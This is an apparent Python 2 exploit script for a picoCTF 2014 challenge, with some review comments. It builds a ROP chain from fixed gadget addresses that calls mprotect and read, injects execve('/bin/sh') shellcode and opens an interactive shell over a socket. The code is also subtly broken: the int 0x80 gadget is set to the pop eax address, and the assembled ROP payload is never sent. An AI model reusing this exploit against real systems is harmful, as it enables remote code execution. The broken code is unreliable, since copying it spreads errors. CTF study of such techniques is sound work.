- #!/usr/bin/python
- import struct
- import socket
- import telnetlib
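def pack4(v):
    """
    Takes a 32 bit integer and returns a 4 byte string representing the
    number in little endian.

    Raises ValueError when ``v`` is outside the unsigned 32-bit range.  An
    explicit check is used instead of ``assert`` because ``assert`` is
    stripped under ``python -O``, which would let an out-of-range value
    reach struct.pack and fail with a less helpful struct.error.
    """
    if not 0 <= v <= 0xffffffff:
        raise ValueError("pack4 expects an unsigned 32-bit integer, got %r" % (v,))
    # The < is for little endian, the I is for a 4 byte unsigned int.
    # See https://docs.python.org/2/library/struct.html for more info.
    return struct.pack('<I', v)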
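def unpack4(v):
    """Does the opposite of pack4.

    Takes exactly 4 bytes in little endian and returns the unsigned 32 bit
    integer they encode.  Raises ValueError for any other length; an explicit
    check is used rather than ``assert`` because ``assert`` is stripped under
    ``python -O``.
    """
    if len(v) != 4:
        raise ValueError("unpack4 expects exactly 4 bytes, got %d" % len(v))
    # '<I' mirrors pack4: little endian, 4 byte unsigned int.
    return struct.unpack('<I', v)[0]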
# Proof-of-concept client for a CTF challenge: the commented-out connect()
# below names the original picoCTF 2014 host, the live one is localhost.
# NOTE(review): this is Python 2 code (makefile(bufsize=0), telnetlib, str
# payloads); it will not run unchanged on Python 3.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#s.connect(('vuln2014.picoctf.com', 4000))
s.connect(('127.0.0.1', 4000))
# bufsize=0 makes the file wrapper unbuffered, so each write() goes straight
# to the socket.
f = s.makefile('rw', bufsize=0)
seed = 0x1e
f.write(pack4(seed))
payload = "A" * 31
"""
int 0x80; ret offset found @ pos f0030fa
pop eax; ret found @ pos f000d25
pop ebx; ret found @ pos f0010a4
pop ecx; ret found @ pos f001985
pop edx; ret found @ pos f00107f
"""
# Gadget addresses are hard-coded constants taken from the challenge binary
# (listed in the string above).  NOTE(review): fixed addresses like these
# presumably rely on the target being loaded at a known, non-randomised
# address; a PIE/ASLR build would invalidate them -- confirm against the
# challenge setup.
pop_eax = pack4(0xf000d25)
pop_ebx = pack4(0xf0010a4)
pop_ecx = pack4(0xf001985)
pop_edx = pack4(0xf00107f)
int_80 = pack4(0xf000d25)
####mprotect
payload += pop_eax
payload += pack4(0x7d) #syscall no of mprotect
payload += pop_ebx
payload += pack4(0xf000000) #buf
payload += pop_ecx
payload += pack4(0x1000 * 10) #size
payload += pop_edx
payload += pack4(7) #perms
payload += int_80
####read
payload += pop_eax
payload += pack4(3) #syscall no of read()
payload += pop_ebx
payload += pack4(0) #stdin
payload += pop_ecx
payload += pack4(0xf000000) #buf
payload += pop_edx
payload += pack4(30) #size of shellcode (buf)
payload += int_80
###trigger payload
push_ebx = pack4(0xf00083f)
payload += pop_ebx
payload += pack4(0xf000000) #addr of shellcode
payload += push_ebx
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
f.write(shellcode)
# Hand the already-connected socket to telnetlib for an interactive session.
t = telnetlib.Telnet()
t.sock = s
t.interact()